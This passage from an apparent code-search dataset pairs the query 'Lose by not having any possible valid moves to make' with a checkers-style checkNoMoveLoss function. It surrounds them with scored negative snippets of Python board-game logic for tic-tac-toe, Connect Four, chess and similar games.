numpy.rot90(b5,3)).all():\r\n return (1,3), False\r\n\r\n b5 = numpy.array([[0,0,1],[0,1,2],[2,0,0]])\r\n if (b == b5).all():\r\n return (1,1), False\r\n elif (b == numpy.rot90(b5,1)).all():\r\n return (1,3), False\r\n elif (b == numpy.rot90(b5,2)).all():\r\n return (3,3), False\r\n elif (b == numpy.rot90(b5,3)).all():\r\n return (3,1), False\r\n\r\n # at this point, all possible boards should have been covered\r\n\r\n # if 7th move, and a winning or losing one\r\n if board_count == 9:\r\n # find the row or col with 2 open slots and mark it\r\n for ri in range(3):\r\n r = b[ri]\r\n if sum([1 if i==0 else 0 for i in r]) == 2:\r\n if r[0] == 0:\r\n return (ri+1,1), False\r\n else:\r\n return (ri+1,2), False\r\n for ci in range(3):\r\n c = get_col(b, ci)\r\n if sum([1 if i==0 else 0 for i in c]) == 2:\r\n if c[0] == 0:\r\n return (1,ci+1), False\r\n else:\r\n return (2,ci+1), False\r\n\r\n \r\n # IF HUMAN HAS FIRST TURN\r\n # if 2nd move\r\n if board_count == 2:\r\n if b[1][1] == 0:\r\n # if the center is open, computer has\r\n # to take it in order to not lose\r\n return (2,2), False\r\n else:\r\n # otherwise take a corner\r\n return (1,1), False\r\n\r\n # if 4th move\r\n if board_count == 5:\r\n # if we took a corner on move 2 and they\r\n # are using computer's offensive strategy\r\n # when it is first player\r\n b4 = [[1,0,0],[0,2,0],[0,0,2]]\r\n if b==b4:\r\n return (3,1), False\r\n # if we took center on move 2\r\n else:\r\n b4 = numpy.array([[2,0,0],[0,1,0],[0,0,2]])\r\n if (b == b4).all() or (b == numpy.rot90(b4,1)).all():\r\n return (1,2), False\r\n\r\n # overall ELSE -- just find a square\r\n for ri in range(3):\r\n for ci in range(3):\r\n if b[ri][ci] == 0:\r\n return (ri+1,ci+1), False", "def check_game_over(self):\n red, blue = self.board.count_piece()\n if blue == 0:\n self.ui.show_result(\"RED WIN!\")\n self.turn = RED\n elif red == 0:\n self.ui.show_result(\"BLUE WIN!\")\n self.turn = BLUE\n elif red == blue == 1:\n self.ui.show_result(\"DRAW!\")", "def _shift_wall_wind(self):\n assert self.wall_wind is not None, 'Please select wall to open first'\n\n wall_index = ALL_WINDS.index(self.wall_wind)\n\n if wall_index == 0:\n wall_index = len(ALL_WINDS) - 1\n else:\n wall_index -= 1\n\n self.wall_wind = ALL_WINDS[wall_index]\n\n return self.wall_wind", "def begin_turn(self):\n pass", "def check_win(self):\n for pos in self.win_set:\n # s would be all 1 if all positions of a winning move is fulfilled\n # otherwise 1s and 0s\n s = set([self.grid[p] for p in pos])\n if len(s) == 1 and (0 not in s):\n return True\n return False", "def main():\r\n turn_left()\r\n while front_is_clear():\r\n move()\r\n turn_right()\r\n while front_is_clear():\r\n move()\r\n turn_right()\r\n while front_is_clear():\r\n move()\r\n turn_left()", "def _walk(self):\n new_pos = self.rect.move((self.move, 0)) # move 9 pixel to the right per frame\n if self.rect.left < self.area.left or self.rect.right > self.area.right:\n self.move = -self.move # move to the opposite direction when the chimp position exceeds the screen\n new_pos = self.rect.move((self.move, 0))\n self.image = pygame.transform.flip(\n self.image, 1, 0\n ) # mirror the chimp to make it looks like turning around\n self.rect = new_pos", "def go_to_waiting(self):\n if self.in_front_of_home:\n if self.dock():\n self.in_front_of_home = False\n elif self.goto_goal(self.home_x, self.home_y):\n self.in_front_of_home = True", "def step(self):\n self.turn_on_corners()\n part_1.Grid.step(self)\n self.turn_on_corners()", "def go_home(self):\n self.move_wl(0)", "def check_win(self, color):\n if dijkstra(self, color) == 0:\n return True\n else:\n return False", "def check_left_side():\n maze.turn_right()\n #print 'checked left side'\n if maze.go():\n maze.turn_right()\n maze.turn_right()\n maze.go()\n maze.turn_right()\n # print 'i can go left'\n return True\n else:\n #print \"i can't go left\"\n maze.turn_left()\n return False", "def players_turn(sl):\n move = get_move()\n if move[0]:\n move = move[1]\n else:\n return False\n while sl[move-1].filled:\n print_board(sl)\n print('that spot is full')\n move = get_move()\n sl[move-1].set_x()\n return True", "def _turn(self, player):\n row, column = player.turn(self.board.representation())\n if self.board.move(player.mark, row, column):\n print(self.board)\n print(f'Player {player.mark} has won! :-)')\n return True\n\n if self.board.is_full():\n print(self.board)\n print('Board is full, tie.')\n return True\n\n return False", "def win_game(self):\n wingame = GLabel('YOU WIN! :D')\n wingame.font = '-50'\n self.window.add(wingame, x=self.window.width / 6, y=self.window.height * 0.666)", "def turn(self):\r\n # 1 throw the dice\r\n if (\r\n not self.player_list[self.current_player].is_in_jail()\r\n or self.try_leave_jail()\r\n ):\r\n thr = Throw()\r\n while thr is not None:\r\n # check in where the current player will land\r\n new_position = self.compute_new_position_from_dice(\r\n self.current_player, thr\r\n )\r\n self.move_player_to(self.current_player, new_position, thr=thr)\r\n\r\n if thr.is_double():\r\n thr = Throw()\r\n else:\r\n thr = None\r\n print(\"------------------------------\")\r\n\r\n self.player_observable_variables()\r\n\r\n # move turn to next player\r\n self.current_player += 1\r\n if self.current_player >= len(self.player_list):\r\n self.current_player = 0\r\n self.full_turn_count += 1\r\n print(\"**********************\")\r\n print(\r\n \"Full turn:\",\r\n self.full_turn_count,\r\n \"\\n\",\r\n \"\\n\".join(map(lambda x: x.full(), self.player_list)),\r\n )\r\n print(\"**********************\")", "def hasWin(self) :\n comparison = self.compareNumberUser()\n if (comparison == 'equal') :\n return True\n else :\n return False", "def handleWin(self, winningplayer):\n self.board.drawWinBoard(winningplayer, self.istournament)\n self.board = None\n self.ui.game = None\n if self.istournament:\n if winningplayer == 1:\n self.ui.tournament.setWinner(1)\n if winningplayer == -1:\n self.ui.tournament.setWinner(2)\n\n threading.Timer(3, self.ui.displayCurrentTournament).start()", "def check_borders(self):\n # Go Homer!\n # https://en.wikipedia.org/wiki/Torus#Flat_torus\n if self._posn.x < 0:\n self._posn.x += self._win_w\n elif self._posn.x > self._win_w:\n self._posn.x -= self._win_w\n if self._posn.y < 0:\n self._posn.y += self._win_h\n elif self._posn.y > self._win_h:\n self._posn.y -= self._win_h", "def turn(self):\n pass", "def test_get_winner():\n\n board = Board()\n board1 = Board()\n board2 = Board()\n\n # board is empty\n board.find_winner(0)\n assert board.get_winner() == board.EMPTY\n\n # vertical win\n for i in range(4):\n board.move(Board.P1, 1)\n\n for i in range(3):\n board.move(Board.P2, 2)\n board.find_winner(1)\n assert board.get_winner() == board.P1\n\n \"\"\"\n Board looks like:\n \n 0 1 2 3 4 5 6 \n +-+-+-+-+-+-+-+\n 0|-|-|-|-|-|-|-|0\n +-+-+-+-+-+-+-+\n 1|-|-|-|-|-|-|-|1\n +-+-+-+-+-+-+-+\n 2|-|X|-|-|-|-|-|2\n +-+-+-+-+-+-+-+\n 3|-|X|O|-|-|-|-|3\n +-+-+-+-+-+-+-+\n 4|-|X|O|-|-|-|-|4\n +-+-+-+-+-+-+-+\n 5|-|X|O|-|-|-|-|5\n +-+-+-+-+-+-+-+\n 0 1 2 3 4 5 6 \n \"\"\"\n\n # horizontal win\n for i in range(4):\n board1.move(Board.P2, i)\n for i in range(3):\n board1.move(Board.P1, 1)\n board1.find_winner(2)\n assert board1.get_winner() == board.P2\n\n \"\"\"\n Board1 looks like:\n \n 0 1 2 3 4 5 6 \n +-+-+-+-+-+-+-+\n 0|-|-|-|-|-|-|-|0\n +-+-+-+-+-+-+-+\n 1|-|-|-|-|-|-|-|1\n +-+-+-+-+-+-+-+\n 2|-|X|-|-|-|-|-|2\n +-+-+-+-+-+-+-+\n 3|-|X|-|-|-|-|-|3\n +-+-+-+-+-+-+-+\n 4|-|X|-|-|-|-|-|4\n +-+-+-+-+-+-+-+\n 5|O|O|O|O|-|-|-|5\n +-+-+-+-+-+-+-+\n 0 1 2 3 4 5 6 \n \"\"\"\n\n # diagonal win\n\n board2.move(Board.P1, 1)\n board2.move(Board.P2, 2)\n\n board2.move(Board.P1, 2)\n board2.move(Board.P2, 3)\n\n board2.move(Board.P1, 4)\n board2.move(Board.P2, 3)\n\n board2.move(Board.P1, 3)\n board2.move(Board.P2, 5)\n\n board2.move(Board.P1, 4)\n board2.move(Board.P2, 4)\n\n board2.move(Board.P1, 4)\n\n board2.find_winner(1)\n assert board2.get_winner() == board.P1\n\n \"\"\"\n Board 2 looks like\n \n 0 1 2 3 4 5 6 \n +-+-+-+-+-+-+-+\n 0|-|-|-|-|-|-|-|0\n +-+-+-+-+-+-+-+\n 1|-|-|-|-|-|-|-|1\n +-+-+-+-+-+-+-+\n 2|-|-|-|-|X|-|-|2\n +-+-+-+-+-+-+-+\n 3|-|-|-|X|O|-|-|3\n +-+-+-+-+-+-+-+\n 4|-|-|X|O|X|-|-|4\n +-+-+-+-+-+-+-+\n 5|-|X|O|O|X|O|-|5\n +-+-+-+-+-+-+-+\n 0 1 2 3 4 5 6 \n \"\"\"", "def checkWinner(self, surface):\r\n winner = True\r\n \r\n # Checks for winner\r\n for point in self.points:\r\n if point.getTeam() == self.getTurn():\r\n winner = False\r\n \r\n # Displays winner message if there is a winner\r\n if winner:\r\n self.surface.fill(BLACK)\r\n winText = graphicalObjects.Text(self.getCurrentString() + ' wins!', WIN_CENTER, 20)\r\n winText.draw(self.surface)\r\n pygame.display.flip()\r\n self.won = True", "def wind(self):\n yield self\n e = self.previous.twin\n while e is not self:\n yield e\n e = e.previous.twin", "def check_for_win(self,board, player_id, action):\n\n row = 0\n\n # check which row was inserted last:\n for i in range(ROWS):\n if board[ROWS - 1 - i, action] == EMPTY_VAL:\n row = ROWS - i\n break\n\n # check horizontal:\n vec = board[row, :] == player_id\n if np.any(np.convolve(WIN_MASK, vec, mode=\"valid\") == 4):\n return True\n\n # check vertical:\n vec = board[:, action] == player_id\n if np.any(np.convolve(WIN_MASK, vec, mode=\"valid\") == 4):\n return True\n\n # check diagonals:\n vec = np.diagonal(board, action - row) == player_id\n if np.any(np.convolve(WIN_MASK, vec, mode=\"valid\") == 4):\n return True\n vec = np.diagonal(np.fliplr(board), ACTION_DIM - action - 1 - row) == player_id\n if np.any(np.convolve(WIN_MASK, vec, mode=\"valid\") == 4):\n return True\n\n return False" ]
[ "0.653839", "0.65257937", "0.64947987", "0.6482304", "0.6401277", "0.6380247", "0.62850153", "0.6280651", "0.62673837", "0.6259922", "0.6240374", "0.62018436", "0.62003434", "0.61975145", "0.61953324", "0.6182207", "0.61644655", "0.61555684", "0.61346805", "0.61338586", "0.61147255", "0.6112215", "0.6098094", "0.60818005", "0.60655445", "0.6048322", "0.6018495", "0.6018415", "0.6005664", "0.59894025", "0.59866536", "0.5977511", "0.59680957", "0.59678936", "0.59583604", "0.5928425", "0.59196067", "0.59184474", "0.5906021", "0.5901521", "0.58730245", "0.58657867", "0.5837158", "0.582541", "0.5816516", "0.58111095", "0.58093446", "0.58058167", "0.58031523", "0.57965946", "0.5792889", "0.57872814", "0.57795197", "0.57791144", "0.57753366", "0.57714874", "0.5764824", "0.57622814", "0.57605463", "0.575606", "0.5749543", "0.5746339", "0.5743451", "0.5740116", "0.5734021", "0.57185864", "0.5699795", "0.56962085", "0.569313", "0.5686135", "0.5685103", "0.5685103", "0.567799", "0.56775415", "0.56747395", "0.56741095", "0.567082", "0.5670223", "0.56649673", "0.5662118", "0.5655011", "0.56530833", "0.5650168", "0.56467336", "0.56460655", "0.5641035", "0.56406236", "0.56392455", "0.56369877", "0.5633366", "0.5630172", "0.56286854", "0.56279254", "0.562781", "0.5626715", "0.5624902", "0.56248176", "0.56244504", "0.5622922", "0.56213725", "0.5621106" ]
0.0
-1
Lose by not having any possible valid moves to make
def checkNoMoveLoss(self, moves): if not moves: winner = "Black" if self.turn[0] == "W" else "White" self.endGame(self.turn + " has nowhere to move. " + winner + " wins!\n")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def any_legal_move(self, player, board):\r\n moves = self.legal_moves(player, board)\r\n #print(moves)\r\n return len(moves)!=0", "def get_valid_moves(self):\r\n # castling and en-passant rights are stored, because move affects these values\r\n temp_enpassant_possible = self.enpas_pos\r\n temp_castle = CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs)\r\n\r\n # for validating a possible move\r\n #1 all possibile moves are generated\r\n #2 each pos moves are made\r\n #3 generate opponent move\r\n #4 check if any of those moves let the king attacked\r\n #5 moves which let the king in chess are eliminated\r\n #6 the moves are undone\r\n moves = self.get_all_possible_moves() # 1\r\n\r\n # castle moves are directly introduced in valid moves\r\n if not self.turn_white:\r\n self.get_castle_moves(self.bKingPos[0], self.bKingPos[1], moves)\r\n else:\r\n self.get_castle_moves(self.wKingPos[0], self.wKingPos[1], moves)\r\n\r\n for i in range(len(moves) - 1, -1, -1): # 2\r\n self.make_move(moves[i])\r\n # 3 #4\r\n self.turn_white = not self.turn_white\r\n if self.in_check():\r\n moves.remove(moves[i]) # 5\r\n self.turn_white = not self.turn_white\r\n self.undo_move()\r\n\r\n # game ending possibilities\r\n if len(moves) == 0:\r\n if self.in_check():\r\n self.checkMate = True\r\n print(\"Checkmate !\")\r\n else:\r\n self.staleMate = True\r\n print(\"Stalemate !\")\r\n else:\r\n self.checkMate = False\r\n self.staleMate = False\r\n\r\n # the rigths are restored, and the values are not affected\r\n self.enpas_pos = temp_enpassant_possible\r\n self.cr_castle_r = temp_castle\r\n\r\n return moves", "def test_no_moves(self):\n game = self.ending(['bw..wwww'], 8, 1)\n game.man_move(0, 2)\n self.assertEqual(game.finish_state,\n (400, game.first_player, 'No moves'))", "def unmakeMove(self, move):", "def move_valid(move):\n return True", "def get_legal_moves(self):\n # for each square in the castle figure out if an moves can occur from it.\n moves = []\n allowed = [self.turn]\n if self.turn == DEFENDER:\n allowed.extend((KING, CASTLE_OCCUPIED))\n it = np.nditer(self.board_state, flags=['multi_index'])\n while not it.finished:\n index = it.multi_index\n curr_loc = it[0]\n if curr_loc in allowed:\n moves.extend(self.get_legal_move_piece(curr_loc, index))\n it.iternext()\n return moves", "def get_legal_moves(self, board):\n moves = set()\n capture_moves = set()\n for move in self.pot_moves:\n target_row = self.field_row + move[0]\n target_col = self.field_col + move[1]\n if self.path_clear(board, move, target_row, target_col):\n if board.status[target_row, target_col] * self.color_value == 0:\n moves.add(move)\n if board.status[target_row, target_col] * self.color_value < 0:\n capture_moves.add(move)\n self.legal_moves = moves\n self.legal_capture_moves = capture_moves", "def legal_moves():\n\tlegal_moves = (\"r\", \"p\", \"s\")\n\treturn legal_moves", "def make_move(self, state):\r\n # intially set drop phase to true\r\n drop_phase = True\r\n move = [] # list to make moves with to return\r\n succ = self.succ(state) # get the successor of this state\r\n # intial postion of board to set up most advantagous spot if its empty\r\n if sum(x.count(self.my_piece) for x in self.board) == 0 and self.board[2][2] == ' ':\r\n move.insert(0, (2, 2))\r\n return move\r\n \r\n # check the number of 'r' and 'b' on board if theres 4 of each drop phase is false\r\n if sum(x.count('r') for x in self.board) == 4 and sum(x.count('b') for x in self.board) == 4:\r\n drop_phase = False\r\n\r\n # if not during drop phase use minimax to make next move from one postion to next\r\n if not drop_phase:\r\n move = []\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n f = d['from']\r\n s = sorted(succ, key=lambda e: e['f'])\r\n moveto = s[-1]\r\n move.insert(1, (moveto['from'][0], moveto['from'][1]))\r\n move.insert(0, (moveto['pos'][0], moveto['pos'][1]))\r\n return move # return the from, to move\r\n\r\n else: #else use minimax and to make move during drop phase selecting spot to place AI piece\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n hold = []\r\n move = []\r\n n = None\r\n hold = []\r\n for s in succ:\r\n p = s['pos'][0]\r\n p1 = s['pos'][1]\r\n if s['f'] == val and state[p][p1] == ' ':\r\n hold.append(s)\r\n if len(hold) == 1:\r\n row = hold[0]['pos'][0]\r\n col = hold[0]['pos'][1]\r\n else:\r\n f = sorted(hold, key=lambda e: e['pos'])\r\n row = f[0]['pos'][0]\r\n col = f[0]['pos'][1]\r\n\r\n move.insert(0, (row, col)) # return the move \r\n return move", "def check_illegal_move(self, player, action):\n available_actions = self.filter_actions(player)\n if action not in available_actions:\n print('Illegal move! Please choose another move!')\n return False\n return True", "def get_legal_moves(self, board):\n moves = set()\n capture_moves = set()\n for move in self.pot_moves:\n target_row = self.field_row + move[0]\n target_col = self.field_col + move[1]\n if not (target_row > 7 or target_row < 0 or target_col > 7 or target_col < 0):\n if board.status[target_row, target_col] == 0:\n moves.add(move)\n if board.status[target_row, target_col] * self.color_value < 0:\n capture_moves.add(move)\n self.legal_moves = moves\n self.legal_capture_moves = capture_moves", "def get_legal_moves(self, board):\n moves = set()\n capture_moves = set()\n if not (self.field_row*self.color_value == 1 or self.field_row*self.color_value == -6):\n self.pot_moves = {(1*self.color_value, 0)}\n\n for move in self.pot_moves:\n target_row = self.field_row + move[0]\n target_col = self.field_col + move[1]\n if self.path_clear(board, move, target_row, target_col):\n if board.status[target_row, target_col] * self.color_value == 0:\n moves.add(move)\n\n for move in self.pot_capture_moves:\n target_row = self.field_row + move[0]\n target_col = self.field_col + move[1]\n if self.path_clear(board, move, target_row, target_col):\n if board.status[target_row, target_col] * self.color_value < 0:\n capture_moves.add(move)\n self.legal_moves = moves\n self.legal_capture_moves = capture_moves", "def get_untried_moves(self, legal_moves):\n\n\t\t# Find all moves for which this node *does* have children\n\t\ttried_moves = [child.move for child in self.child_nodes]\n\n\t\t# Return all moves that are legal but have not been tried yet\n\t\treturn [move for move in legal_moves if move not in tried_moves]", "def report_invalid_move(self, move: BotMove):\n self.invalid_moves.append((self.round, self.turn, move))", "def test_valid_move(self, move):\n if self.game_state[move[0]][move[1]] is not None:\n return False\n return True", "def legal_moves_generator(self, custom=False):\r\n possible_moves = self.null_positions\r\n possible_moves.add('PASS')\r\n temp_state = np.array(self.state)\r\n illegal_moves = set()\r\n for pos in possible_moves:\r\n illegal = True\r\n if pos != 'PASS':\r\n ortho = ORTHOGONAL_POSITIONS[(pos[0], pos[1])]\r\n for p in ortho:\r\n if self.state[p[0]][p[1]] == 0:\r\n illegal = False\r\n break\r\n elif self.to_move != self.board[p[0]][p[1]].color:\r\n if self.board[p[0]][p[1]].liberty == 1:\r\n illegal = False\r\n break\r\n\r\n elif self.state[p[0]][p[1]] == self.to_move:\r\n if self.board[p[0]][p[1]].liberty > 1:\r\n illegal = False\r\n break\r\n if illegal:\r\n illegal_moves.add(pos)\r\n temp_state = np.array(self.state)\r\n continue\r\n\r\n for p in ortho:\r\n if self.to_move != self.board[p[0]][p[1]].color:\r\n if self.board[p[0]][p[1]].liberty == 1:\r\n temp_state[p[0]][p[1]] = 0\r\n\r\n temp_state[pos[0]][pos[1]] = self.to_move\r\n if (temp_state == self.previous_state).all(): # KO RULE CHECK\r\n illegal_moves.add(pos)\r\n temp_state = np.array(self.state)\r\n continue\r\n temp_state = np.array(self.state)\r\n\r\n possible_move_pos = possible_moves - illegal_moves\r\n if custom:\r\n return possible_move_pos\r\n\r\n legal_moves_queue = PriorityQueue()\r\n\r\n for possible_move in possible_move_pos:\r\n move_obj = Move(possible_move, self.to_move, self)\r\n legal_moves_queue.put((-move_obj.priority, move_obj))\r\n return legal_moves_queue", "def safemoves():\n safe = []\n \n for move in board.moves():\n if board.rel(move) not in board.adjacent(board.them()):\n if any(map(board.passable,board.adjacent(board.rel(move)))):\n safe.append(move)\n\n\n if DEBUG:\n log.write(\"me\" + repr(board.me()) + \"\\n\")\n log.write(\"them\" + repr(board.them()) + \"\\n\")\n log.write(\"moves\"+ repr(board.moves()) + \"\\n\")\n log.write(\"safemoves\"+ repr(safe) + \"\\n\")\n return safe", "def is_legal(self, move, player, board):\r\n if(self.is_valid(move)==False):\r\n return False\r\n if(board[move]!=core.EMPTY):\r\n return False\r\n return True", "def make_legal_move(move, board, start, end, move_number, en_passant_square, king_w, king_b, rook_w_l, rook_w_r,\n rook_b_l,\n rook_b_r, promotion_piece):\n # this function should have essentially what i had in main at first without making the move\n test_board = board.copy()\n valid_move = False\n piece = find_piece(board, start)\n end_piece = find_piece(board, end)\n\n if switch_player(move_number): # for whites move\n if (65 <= ord(piece) <= 90) and (validate_move(board, end, move_number)):\n if piece == \"P\":\n if pawn(board, start, end, move_number):\n if end[0] == 8:\n promotion(test_board, start, end, promotion_piece)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n promotion(board, start, end, promotion_piece)\n return True\n else:\n valid_move = False\n else:\n valid_move = True\n else:\n if can_en_passant(board, en_passant_square, end, start, move_number):\n execute_enpassant(test_board, start, end, move_number)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n execute_enpassant(board, start, end, move_number)\n return True\n else:\n return False\n elif piece == \"K\":\n if king(start, end):\n if controlled_squares(board, move_number, end):\n valid_move = True\n elif piece == \"N\":\n if knight(start, end):\n valid_move = True\n elif piece == \"B\":\n if bishop(board, start, end):\n valid_move = True\n elif piece == \"Q\":\n if queen(board, start, end):\n valid_move = True\n elif piece == \"R\":\n if rook(board, start, end):\n valid_move = True\n else:\n valid_move = False\n if valid_move:\n update_board(test_board, start, end)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n update_board(board, start, end)\n return True\n else:\n retract_move(test_board, start, end, end_piece)\n print(\"Illegal Move\")\n return False\n if not switch_player(move_number):\n if (97 <= ord(piece) <= 122) and validate_move(board, end, move_number):\n if piece == \"p\":\n if pawn(board, start, end, move_number):\n if end[0] == 1:\n promotion(test_board, start, end, promotion_piece)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n promotion(board, start, end, promotion_piece)\n return True\n else:\n valid_move = False\n else:\n valid_move = True\n else:\n if can_en_passant(board, en_passant_square, end, start, move_number):\n execute_enpassant(test_board, start, end, move_number)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n execute_enpassant(board, start, end, move_number)\n return True\n else:\n valid_move = False\n elif piece == \"k\":\n if king(start, end):\n if controlled_squares(board, move_number, end):\n valid_move = True\n elif piece == \"n\":\n if knight(start, end):\n valid_move = True\n elif piece == \"b\":\n if bishop(board, start, end):\n valid_move = True\n elif piece == \"q\":\n if queen(board, start, end):\n valid_move = True\n elif piece == \"r\":\n if rook(board, start, end):\n valid_move = True\n else:\n valid_move = False\n if valid_move:\n update_board(test_board, start, end)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n update_board(board, start, end)\n return True\n else:\n retract_move(test_board, start, end, end_piece)\n print(\"Illegal Move\")\n return False", "def is_legal_move(self, current_player, move):\n\t\tstarting_pos = move[0]\n\t\tending_pos = move[1]\n\t\tif ending_pos[0] not in range(self.board_size) or ending_pos[1] not in range(self.board_size):\t# Discard any generated moves that fall off of the board\n\t\t\treturn False \n\t\tif self.board.repr[starting_pos[0]][starting_pos[1]]!=self.player_symbol[current_player]:\n\t\t\tprint \"this should never trigger and is redundant\"\n\t\t\treturn False\n\t\tif self.board.repr[ending_pos[0]][ending_pos[1]]!= '.':\t# Check that landing spot is empty\n\t\t\treturn False\n\t\tmiddle_pos = (starting_pos[0]-(starting_pos[0]-ending_pos[0])/2,starting_pos[1]-(starting_pos[1]-ending_pos[1])/2)\t# Check the middle spot is the other piece - this should in theory not matter because the pieces alternate\n\t\tother_player = 1 - current_player \n\t\tif self.board.repr[middle_pos[0]][middle_pos[1]] != self.player_symbol[other_player]:\n\t\t\treturn False \n\t\treturn True", "def test_check_move_with_invalid(self):\n board = [\n [\" \"] * 6,\n [\" \"] * 6,\n [\" \"] * 6,\n [\" \"] * 6,\n [\"\\u25cb\"] * 6,\n [\" \"] * 6,\n [\" \"] * 6\n ]\n valid = self.game.check_move(board, 4)\n self.assertFalse(valid)", "def move_check(self):\r\n \r\n if not self.run:\r\n return False\r\n \r\n if self.get_num_legal_moves() == 0:\r\n SlTrace.lg(\"NO more legal moves!\", \"nolegalmoves\")\r\n ###return False \r\n \r\n if self.new_move:\r\n self.announce_player(\"start_move\")\r\n if SlTrace.trace(\"selected\"):\r\n self.list_selected(\"After start_move\")\r\n self.new_move = False\r\n player = self.get_player()\r\n if player is None:\r\n return False\r\n \r\n return True", "def op_move_preconditions(self):\n\n if(self.next_move != self.FREE):\n return False\n\n return True", "def takeNaiveMove():\r\n\tnotFound=True\r\n\twhile notFound:\r\n\t\tmove=random.randint(1,9)\r\n\t\tif validMove(move):\r\n\t\t\tnotFound=False\r\n\treturn move", "def _isvalidmove(self, from_, to_):\n if self.board[from_].occupant is None:\n print(\"Moving from empty square\")\n return False\n piece = self.board[from_].occupant\n\n if piece.color != self.to_move:\n print(\"Wrong color\")\n return False\n\n if self.is_checked:\n if piece.notation != 'K':\n print(\"King is checked!\")\n return False\n\n diff = (\n to_cartesian(to_)[0] - to_cartesian(from_)[0],\n to_cartesian(to_)[1] - to_cartesian(from_)[1]\n )\n if not piece.hopping:\n if self.board.isblocked(from_, to_):\n print(\"Move blocked by other pieces\")\n return False\n\n if self.board[to_].occupant is not None:\n if piece.color == self.board[to_].occupant.color:\n print(\"Cannot capture friendly\")\n return False\n\n if diff not in piece.get_captures():\n print(\"Invalid piece capture\")\n return False\n\n if diff not in piece.get_moves():\n print(\"Invalid piece move\")\n return False\n\n return True", "def _unmove(self):\n (start, end) = self.history.pop()\n self._board[start] = self._board[end]\n self._board[end] = 0\n self.winner = None\n self.player_turn = CheckersGame.opposite[self.player_turn]", "def valid_move(self, row, col):\n if not self._game_over:\n i_row, i_col = row-1, col-1\n #i_row and i_col wil be used to index the board (hence the i)\n (valid, flip_lst) = self._valid_placement(i_row, i_col)\n #print(\"FOR TESTING. Tiles Flipped: \", flip_lst)\n \n if valid:\n #Big Change: You decided to make determining validity\n # and flipping separate operations\n self._flip(i_row, i_col, flip_lst)\n else:\n print(\"\\nPlease enter a valid move!\")\n return False\n\n if self._board_is_full():\n self._game_over = True\n self._set_winner() \n \n self._switch_turn(self._turn)\n if not self._valid_move_exists(): #Check if the other player has any valid moves\n print(\"\\nNo valid moves exist for {0}. {0}'s turn has been skipped\".format(self._turn))\n self._switch_turn(self._turn) #Switch turn back to player before skip was determined\n if not self._valid_move_exists(): #Check if the other player has any valid moves\n print(\"No valid moves exist for {0}. {0}'s turn has been skipped\".format(self._turn))\n print(\"No moves exist for either player. GAME OVER\")\n self._game_over = True\n self._set_winner()\n return False\n\n return True\n elif self._game_over:\n print(\"The game is over. No more moves can be made!\")\n #TODO: Replace this^ with an exception later?\n return False", "def test_move_knight_illegally(self):\n self.c.board = [[(0, 0) for i in range(8)] for i in range(8)]\n for piece in [('N', True), ('N', False)]:\n self.c.turn = piece[1]\n self.c.board[4][4] = piece\n dests = [col + row for col in 'abcdefgh' for row in '12345678']\n for dest in dests:\n if dest in ['d6', 'f6', 'c5', 'g5', 'c3', 'g3', 'd2', 'f2']:\n continue\n self.groups['dest'] = dest\n self.assertRaises(\n MoveNotLegalError, self.c._knight_evaluator, self.groups)", "def handle_unmake(self, move):\n# print \"board:handle_make pgn = \" + move.pgn\n if not move: return\n # remove en passant capture\n if move.is_en_passant():\n self.put(move.dst + (8 if move.is_white() else -8), \\\n 'p' if move.is_white() else 'P')\n\n # move rook when castling\n if move.is_castling_short():\n if move.is_white():\n self.move((61,63))\n else:\n self.move((5,7))\n if move.is_castling_long():\n if move.is_white():\n self.move((59, 56))\n else:\n self.move((3, 0))\n\n # now move itself\n self.move((move.dst, move.src))\n \n # recover capture\n if move.is_capture():\n p = move.get_captured_piece()\n if move.is_white(): p = p.lower()\n self.put(move.dst, p)\n\n # Recover promoted piece\n if move.is_promotion():\n self.remove(move.src)\n self.put(move.src, 'P' if move.is_white() else 'p')\n self.update_vars_list()", "def generate_valid_moves(self):\n #make sure we have a valid roll\n if (self.roll != (0,0)):\n #if doubles, need to do 4 moves\n if (self.roll[0] == self.roll[1]):\n #need to seed the initial moveset\n mv = self.board.find_moveable_pieces(self.roll[0], self.player)\n mv2 = []\n #apply the remaining 3 rolls\n for i in range(0,3):\n for mboard in mv:\n mv2.extend(mboard.find_moveable_pieces(self.roll[0], self.player))\n mv = list(set(mv2))\n mv2 = []\n else:\n #need to condisider d1 then d2 and d2 then d1\n d1d2 = self.board.find_moveable_pieces(self.roll[0], self.player)\n d2d1 = self.board.find_moveable_pieces(self.roll[1], self.player)\n d1d2_2 = []\n d2d1_2 = []\n for mboard in d1d2:\n d1d2_2.extend(mboard.find_moveable_pieces(self.roll[1], self.player))\n for mboard in d2d1:\n d2d1_2.extend(mboard.find_moveable_pieces(self.roll[0], self.player))\n mv = d1d2_2\n mv.extend(d2d1_2)\n self.moves = list(set(mv))", "def make_move(self, state):\n emptySpaces = 0\n for row in state:\n emptySpaces = emptySpaces + row.count(' ')\n if emptySpaces > 17:\n drop_phase = True\n else:\n drop_phase = False\n\n move = []\n if not drop_phase:\n best_value = float('-inf')\n best_state = None\n for s in self.succ(state, False, self.my_piece):\n if self.game_value(s) == -1 or self.game_value(s) == 1:\n best_state = s\n break\n currValue = self.Min_Value(state, 0)\n if currValue>best_value:\n best_value = currValue\n best_state = s\n for i in range(len(state)):\n for j in range(len(state[i])):\n if state[i][j]!= ' ' and best_state[i][j]== ' ':\n move.append((i,j))\n if state[i][j]== ' ' and best_state[i][j]!= ' ':\n move.insert(0, (i,j))\n \n # TODO: choose a piece to move and remove it from the board\n # (You may move this condition anywhere, just be sure to handle it)\n #\n # Until this part is implemented and the move list is updated\n # accordingly, the AI will not follow the rules after the drop phase!\n \n\n # select an unoccupied space randomly\n # TODO: implement a minimax algorithm to play better\n \n else:\n best_value = float('-inf')\n best_state = None\n for s in self.succ(state, True, self.my_piece):\n if self.game_value(s) == -1 or self.game_value(s) == 1:\n best_state = s\n break\n currValue = self.Min_Value(state, 0)\n if 